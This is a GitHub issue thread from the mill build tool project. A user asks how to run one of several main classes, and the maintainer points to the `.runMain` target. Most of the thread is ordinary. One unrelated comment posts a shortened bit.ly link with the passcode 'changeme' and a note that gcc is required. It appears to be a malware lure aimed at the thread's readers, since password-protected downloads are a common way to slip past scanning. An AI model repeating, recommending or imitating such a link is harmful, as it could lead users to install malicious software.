### ISSUE TITLE
Document `runMain` target next to `run`

### ISSUE THREAD

**Issue by jk-1** [com-lihaoyi/mill#3464]
If I have multiple main classes in my target and try to run it, run fails:

```
mill show myApp.run
[1/1] show > [40/58] myApp.finalMainClass 
1 targets failed
show 1 targets failed
myApp.finalMainClass Multiple main classes found (com.company.apps.ExpMain01,com.company.apps.ExpMain02) please explicitly specify which one to use by overriding mainClass

```

Last time I used `sbt` it had nice feature for these cases: User could either give the main class on command line or `sbt` printed numbered list of all main classes and user selected number from the list. 
`Sbt` also passed possible command line arguments to the selected main class.

Please add possibility to give the main class as command line argument. If `mill myApp.run` shows all main classes then easy to copy paste correct main class to run command and try again.
The numbered list of main classes would also be very nice feature but the support for command line argument is more important: it can also be used in scripts.

This way user can run several main classes for e.g. experimenting things without editing/versioning `build.sc`

**Comment by RamonAlvesPS** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by lihaoyi** [comment]
This is what `.runMain` is for, you pass in the class name as the first argument and main args as subsequent args

**Comment by jk-1** [comment]
Thanks! Just what I needed!
